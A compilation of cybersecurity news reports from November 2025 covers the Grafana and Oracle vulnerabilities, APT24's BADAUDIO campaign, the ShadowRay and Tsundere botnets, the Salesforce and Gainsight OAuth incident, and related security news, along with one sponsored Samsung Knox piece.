2025-11-22 AI创业新闻

Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation

Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The vulnerability, tracked as CVE-2025-41115 , carries a CVSS score of 10.0. It resides in the System for Cross-domain Identity Management ( SCIM ) component that allows automated user provisioning and management. First introduced in April 2025, it’s currently in public preview.

“In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow for overriding internal user IDs and lead to impersonation or privilege escalation,” Grafana’s Vardan Torosyan said . That said, successful exploitation hinges on both conditions being met - enableSCIM feature flag is set to true user_sync_enabled config option in the [auth.scim] block is set to true The shortcoming affects Grafana Enterprise versions from 12.0.0 to 12.2.1. It has been addressed in the following versions of the software - Grafana Enterprise 12.0.6+security-01 Grafana Enterprise 12.1.3+security-01 Grafana Enterprise 12.2.1+security-01 Grafana Enterprise 12.3.0 “Grafana maps the SCIM externalId directly to the internal user.uid; therefore, numeric values (e.g. ‘1’) may be interpreted as internal numeric user IDs,” Torosyan said.

“In specific cases this could allow the newly provisioned user to be treated as an existing internal account, such as the Admin, leading to potential impersonation or privilege escalation.” The analytics and observability platform said the vulnerability was discovered internally on November 4, 2025, during an audit and testing. Given the severity of the issue, users are advised to apply the patches as soon as possible to mitigate potential risks. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple’s equipment AirDrop, allowing users to more easily share files and photos between Android and iPhone devices. The cross-platform sharing feature is currently limited to the Pixel 10 lineup and works with iPhone, iPad, and macOS devices, with plans to expand to additional Android devices in the future. In order to transfer a file from a Pixel 10 phone over AirDrop, the only caveat is that the owner of the Apple device is required to make sure their iPhone (or iPad or Mac) is discoverable to anyone – which can be enabled for 10 minutes. Likewise, to receive content from an Apple device, Android device users will need to adjust their Quick Share visibility settings to Everyone for 10 minutes or be in Receive mode on the Quick Share page, according to a support document published by Google.

“We built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products,” Dave Kleidermacher, vice president of Platforms Security and Privacy at Google, said . At the heart of the future is a multi-layered security approach that’s powered by the memory-safe Rust programming language to create a secure sharing channel that Google said eliminates entire classes of memory safety vulnerabilities, making its implementation resilient against attacks that attempt to exploit memory errors. The tech giant also noted that the feature does not rely on any workaround and that the data is not routed through a server, adding it’s open to working with Apple to enable “Contacts Only” mode in the future. “Google’s implementation of its version of Quick Share does not introduce vulnerabilities into the broader protocol’s ecosystem,” NetSPI, which carried out an independent assessment in August 2025, said.

“While it shares specific characteristics with implementations made by other manufacturers, this implementation is reasonably more secure. In fact, the process of file exchange is notably stronger, as it doesn’t leak any information, which is a common weakness in other manufacturers’ implementations.” That said, its analysis uncovered a low-severity information disclosure vulnerability (CVSS score: 2.1) that could permit an attacker with physical access to the device to access information, such as image thumbnails and SHA256 hashes of phone numbers and email addresses. It has since been addressed by Google. The development comes as Google said it blocked in India more than 115 million attempts to install sideloaded apps that request access to sensitive permissions for financial fraud.

The company also said it’s piloting a new feature in the country in collaboration with financial services like Google Pay, Navi, and Paytm to combat scams that trick users into opening the apps when sharing their screens. “Devices running Android 11+ now show a prominent alert if a user opens one of these apps while screen sharing on a call with an unknown contact,” Evan Kotsovinos, vice president of privacy, safety, and security at Google, said . “This feature provides a one-tap option to end the call and stop screen sharing, protecting users from potential fraud. Lastly, Google said it’s also developing Enhanced Phone Number Verification (ePNV), which it described as a new Android-based security protocol that replaces SMS OTP flows with SIM-based verification to improve sign-in security.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Why IT Admins Choose Samsung for Mobile Security

Ever wonder how some IT teams keep corporate data safe without slowing down employees? Of course you have. Mobile devices are essential for modern work—but with mobility comes risk. IT admins, like you, juggle protecting sensitive data while keeping teams productive.

That’s why more enterprises are turning to Samsung for mobile security. Hey—you’re busy, so here’s a quick-read article on what makes Samsung Galaxy devices and Knox Suite really stand out. Security built in. Management simplified.

Samsung Galaxy devices come with Samsung Knox built in at the manufacturing stage, creating a hardware foundation that extends visibility and control across your security infrastructure. Simplified management with Knox Suite: Samsung’s all-in-one package to manage and secure work devices grants centralized control without the need for extra tools or workflows (that got your attention!). Integrated security: Samsung Knox is built into both hardware and software, giving multi-layered protection against malware attacks. Government-grade protection: Secure boot, trusted execution environments, and more—that means these devices are ready for enterprise demands!

With Samsung Galaxy, security isn’t just software—it’s the foundation of your devices. Strengthening Zero Trust without the hassle Mobile threats can appear anywhere. To mitigate the risks, Samsung Galaxy devices are Zero Trust ready, while Samsung Knox enforces strict access controls within your systems. Let’s take a quick look: Device Integrity: Samsung Galaxy devices, managed or unmanaged, verify their integrity before connecting to corporate resources.

See how. Zero Trust Network Access (ZTNA): Businesses can get high-speed Zero Trust Network Access natively from Samsung Galaxy devices. Real-time security signals: Knox Asset Intelligence (part of Knox Suite - Enterprise Plan) sends almost-real-time device telemetry into security information and event management (SIEM) tools, so mobile threats appear alongside other alerts. Check out Samsung’s article on Knox Asset Intelligence for Microsoft Sentinel!

Think of it as a live dashboard for every device without adding extra complexity. Samsung Knox helps you stay strict without making life harder for your team—that’s a win-win! Extending your EMM strategy… without adding headaches Knox Suite amplifies the EMM tools you already use, further strengthening your enterprise mobility management.

IT admins get deeper security, smarter insights, and tighter control while keeping existing workflows intact. What’s more, it’s compatible with most EMM tools! With Knox Suite, you can: Equip your frontline with the tools they need to succeed. Leverage powerful features such as Knox Authentication Manager for seamless, secure access.

And, ensure operational continuity of your Line of Business apps by enforcing OS compatibility through Knox E-FOTA. Gain unmatched control and security over your organization’s devices with Knox Mobile Enrollment, which allows you to securely lock devices to your organization–even after a factory reset–until released by an admin. Stay ahead of threats with the Knox Asset Intelligence security center dashboard, which provides a comprehensive look at your entire Samsung fleet, highlighting vulnerabilities and patch levels for unique chipsets. In short, Knox Suite enhances the value of your EMM tools—providing IT with enterprise-grade security and visibility without slowing day-to-day operations.

Why Samsung is a trusted partner for IT admins Here’s the deal: Samsung’s Knox Suite helps to manage and secure work devices for today’s challenges and tomorrow’s threats. Protect sensitive data: Layered hardware and software defences keep corporate information safe. Maintain productivity: Users stay productive while IT remains in control. Future-ready: Knox evolves alongside security threats, policies, and enterprise needs.

Security doesn’t have to be complicated—it just needs the right foundation. By choosing Samsung, enterprises can confidently embrace mobility while safeguarding their most valuable assets: data and reputation. Want to be the IT hero who brought security and productivity to your team? Here’s all you need to know!

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains

A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. “While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan,” Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez said . “This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.” APT24, also called Pitty Tiger, is the moniker assigned to a suspected Chinese hacking group that has targeted government, healthcare, construction and engineering, mining, nonprofit, and telecommunications sectors in the U.S. and Taiwan.

According to a July 2014 report from FireEye, the adversary is believed to be active as early as 2008, with the attacks leveraging phishing emails to trick recipients into opening Microsoft Office documents that, in turn, exploit known security flaws in the software (e.g., CVE-2012-0158 and CVE-2014-1761 ) to infect systems with malware. Some of the malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader called MM RAT (aka Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable malware put to use by the threat actor is a backdoor named Taidoor (aka Roudan). APT24 is assessed to be closely related to another advanced persistent threat (APT) group called Earth Aughisky, which has also deployed Taidoor in its campaigns and has leveraged infrastructure previously attributed to APT24 as part of attacks distributing another backdoor referred to as Specas.

Both the malware strains, per an October 2022 report from Trend Micro, are designed to read proxy settings from a specific file “%systemroot%\system32\sprxx.dll.” The latest findings from GTIG show that the BADAUDIO campaign has been underway since November 2022, with the attackers using watering holes, supply chain compromises, and spear-phishing as initial access vectors. A highly obfuscated malware written in C++, BADAUDIO uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that’s capable of downloading, decrypting, and executing an AES-encrypted payload from a hard-coded command and control (C2) server. It works by gathering and exfiltrating basic system information to the server, which responds with the payload to be run on the host. In one case, it was a Cobalt Strike Beacon.

BADAUDIO campaign overview “BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications,” GTIG said. “Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.” From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites to inject malicious JavaScript code to specifically exclude visitors coming from macOS, iOS, and Android, generate a unique browser fingerprint using the FingerprintJS library, and serve them a fake pop-up urging them to download BADAUDIO under the guise of a Google Chrome update. Then, starting in July 2024, the hacking group breached a regional digital marketing firm in Taiwan to orchestrate a supply chain attack by injecting the malicious JavaScript into a widely used JavaScript library that the company distributed, effectively allowing it to hijack more than 1,000 domains. The modified third-party script is configured to reach out to a typosquatted domain impersonating a legitimate Content Delivery Network (CDN) and fetch the attacker-controlled JavaScript to fingerprint the machine and then serve the pop-up to download BADAUDIO after validation.

“The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts,” Google said. “This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain.” Compromised JS supply chain attack to deliver BADAUDIO malware “However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.” APT24 has also been observed conducting targeted phishing attacks since August 2024, using lures related to an animal rescue organization to trick recipients into responding and ultimately deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages come fitted with tracking pixels to confirm whether the emails were opened by the targets and tailor their efforts accordingly. “The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage,” Google said.

China-Nexus APT Group Targets Southeast Asia The disclosure comes as CyberArmor detailed a sustained espionage campaign orchestrated by a suspected China-nexus threat actor against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. The activity has been codenamed Autumn Dragon . The attack chain commences with a RAR archive likely sent as an attachment in spear-phishing messages that, when extracted, exploits a WinRAR security flaw ( CVE-2025-8088 , CVSS score: 8.8) to launch a batch script (“Windows Defender Definition Update.cmd”) that sets up persistence to ensure that the malware is launched automatically when the user logs in to the system the next time. It also downloads a second RAR archive hosted on Dropbox via PowerShell.

The RAR archive contains two files, a legitimate executable (“obs-browser-page.exe”) and a malicious DLL (“libcef.dll”). The batch script then runs the binary to sideload the DLL, which then communicates with the threat actor over Telegram to fetch commands (“shell”), capture screenshots (“screenshot”), and drop additional payloads (“upload”). “The bot controller (threat actor) uses these three commands to gather information and perform reconnaissance of the victim’s computer and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said. “This design enables the controller to remain stealthy and evade detection.” The third stage once again involves the use of DLL side-loading to launch a rogue DLL (“CRClient.dll”) by using a real binary (“Creative Cloud Helper.exe”), which then decrypts and runs shellcode responsible for loading and executing the final payload, a lightweight implant written in C++ that can communicate with a remote server (“public.megadatacloud[.]com”) and supports eight different commands - 65, to run a specified command using “cmd.exe,” gather the result, and exfiltrate it back to the C2 server 66, to load and execute a DLL 67, to execute shellcode 68, to update configuration 70, to read a file supplied by the operator 71, to open a file and write the content supplied by the operator 72, to get/set the current directory 73, to sleep for a random interval and terminate itself While the activity has not been tied to a specific threat actor or group, it’s possibly the work of a China-nexus group possessing intermediate operational capabilities.

This assessment is based on the adversary’s continued targeting of countries surrounding the South China Sea . “The attack campaign is targeted,” the researchers said. “Throughout our analysis, we frequently observed the next stages being hosted behind Cloudflare, with geo-restrictions enabled, as well as other restrictions such as only allowing specific HTTP User Agents.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny

The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, alleging that the company had misled investors about the security practices that led to the 2020 supply chain attack. In a joint motion filed November 20, 2025, the SEC, along with SolarWinds and its CISO Timothy G. Brown, asked the court to voluntarily dismiss the case.

The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.” SolarWinds and Brown were accused by the SEC in October 2023 of “fraud and internal control failures” and that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks. The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect its assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29. “Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.

However, in July 2024, many of these allegations were thrown out by the U.S. District Court for the Southern District of New York (SDNY), stating “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.” Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack. In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity

Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.

Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them. “There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.” Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked. “This may also impact Oauth access for customer connections while the review is taking place,” Gainsight said.

“No suspicious activity related to Hubspot has been observed at this point.” In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce by compromising third-party OAuth tokens to potentially gain unauthorized access. The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances earlier this August. According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1000 organizations. Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the previous attack.

But it’s not clear at this stage if the earlier breach played a role in the current incident. In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments). “Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out . In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet

Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0 , is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a “ long-standing design decision “ that’s consistent with Ray’s development best practices, which requires it to be run in an isolated network and act upon trusted code.

The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.

However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.

This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.

While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors who can identify which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh . More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).

“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.

The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows

Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using game-related lures.

It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.

“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract . The contract was created on September 23, 2024, and has had 26 transactions to date.

Once the C2 address is retrieved, it checks to ensure it is a valid WebSocket URL, and then proceeds to establish a WebSocket connection with the specific address and receive JavaScript code sent by the server. Kaspersky said it did not observe any follow-up commands from the server during the observation period. “The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions,” Kaspersky said. The botnet operations are facilitated by a control panel that allows logged-in users to build new artifacts using MSI or PowerShell, manage administrative functions, view the number of bots at any given point of time, turn their bots into a proxy for routing malicious traffic, and even browse and purchase botnets via a dedicated marketplace.

Exactly who is behind Tsundere is not known, but the presence of the Russian language in the source code for logging purposes alludes to a threat actor who is Russian-speaking. The activity is assessed to share functional overlaps with a malicious npm campaign documented by Checkmarx, Phylum, and Socket in November 2024. What’s more, the same server has been identified as hosting the C2 panel associated with an information stealer known as 123 Stealer, which is available on a subscription basis for $120 per month. It was first advertised by a threat actor named “koneko” on a dark web forum on June 17, 2025, per Outpost24’s KrakenLabs Team .

Another clue that points to its Russian origins is that the customers are forbidden from using the stealer to target Russia and the Commonwealth of Independent States (CIS) countries. “Violation of this rule will result in the immediate blocking of your account without explanation,” Koneko said in the post at the time. “Infections can occur through MSI and PowerShell files, which provide flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat,” Kaspersky said. Found this article interesting?

ThreatsDay Bulletin: 0-Days, LinkedIn Spies, Crypto Crimes, IoT Flaws and New Malware Waves

This week has been crazy in the world of hacking and online security. From Thailand to London to the US, we’ve seen arrests, spies at work, and big power moves online. Hackers are getting caught. Spies are getting better at their jobs.

Even simple things like browser add-ons and smart home gadgets are being used to attack people. Every day, there’s a new story that shows how quickly things are changing in the fight over the internet. Governments are cracking down harder on cybercriminals. Big tech companies are rushing to fix their security.

Researchers keep finding weak spots in apps and devices we use every day. We saw fake job recruiters on LinkedIn spying on people, huge crypto money-laundering cases, and brand-new malware made just to beat Apple’s Mac protections. All these stories remind us: the same tech that makes life better can very easily be turned into a weapon. Here’s a simple look at the biggest cybersecurity news happening right now — from the hidden parts of the dark web to the main battles between countries online.

Chinese operatives mine LinkedIn for political intel MI5 Warns of Chinese Spies Using LinkedIn to Gather Intel on Lawmakers U.K.’s domestic intelligence agency MI5 has warned lawmakers that Chinese spies are actively reaching out to “recruit and cultivate” them with lucrative job offers on LinkedIn via headhunters or cover companies. Chinese nationals are said to be using LinkedIn profiles to conduct outreach at scale, allegedly on behalf of the Chinese Ministry of State Security. “Their aim is to collect information and lay the groundwork for long-term relationships, using professional networking sites, recruitment agents and consultants acting on their behalf,” House of Commons Speaker Sir Lindsay Hoyle said . The activity is assessed to be “targeted and widespread.” Targets included parliamentary staff, economists, think tank consultants, and government officials.

In a statement shared with BBC, a spokesperson for the Chinese embassy in the UK said accusations of espionage were “pure fabrication” and accused the U.K. of a “self-staged charade.” MI5 is not the only intelligence agency to warn about social media’s potential to allow spying. In July, Mike Burgess, the Director-General of Australia’s Security Intelligence Organization (ASIO), said a foreign intelligence agency tried to find info about an Australian military project by cultivating relationships with people who worked on it. EU rewires privacy playbook E.U.

Floats Proposal for GDPR Changes The European Commission unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the General Data Protection Regulation (GDPR) and “clarify the definition of personal data” to allow companies to lawfully process personal data for AI training without prior consent from users for “legitimate interest” and as long as they do not break any laws. The move has been criticized for pandering to Big Tech’s interests.

It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” the European Digital Rights (eDRI) said . “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.” Browser add-ons turned into data siphons Malicious Browser Extensions Steal Data Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge browsers to steal sensitive data. The extensions were collectively installed about 31,000 times.

The extensions, once installed, could intercept and redirect every web page visited by users, collect browsing data and a list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said . The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook. Crypto launderer’s luxury spree unravels California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam . Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025.

The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.

“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee. Critical Oracle bug opens door to full system takeover Security Flaw in Oracle Identity Manager Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware ( CVE-2025-61757 , CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.

The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said . “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.

Smart relay flaw triggers repeat reboots Security Flaw in Shelly Pro 4PM Smart Relay A critical security flaw in the Shelly Pro 4PM smart relay ( CVE-2025-11243 , CVSS score: 8.3) that an attacker could exploit to cause a device reboot, limiting the ability to detect abnormal power consumption or expose circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said . “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure. Crypto mixer founders jailed for laundering millions Samourai Wallet Co-Founders Get Multi-Year Prison Term Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.

Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around a Bitcoin mixing service known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S.

Justice Department said . glob CLI flaw opens door to code injection Security Flaw in glob CLI A security flaw ( CVE-2025-64756 , CVSS score: 7.5) has been identified in glob CLI’s -c/–cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges," glob maintainers said in an alert. An attacker could leverage the flaw to execute arbitrary commands, compromising a developer's machine or paving the way for supply chain poisoning via malicious packages.

The vulnerability affects Glob versions from 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.” Russian cyber operative caught in Phuket Russian Hacker Wanted by U.S. Arrested in Thailand A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.

Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.

X debuts encrypted messaging with PIN-secured keys X Rolls Out Encrypted Chat X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said .

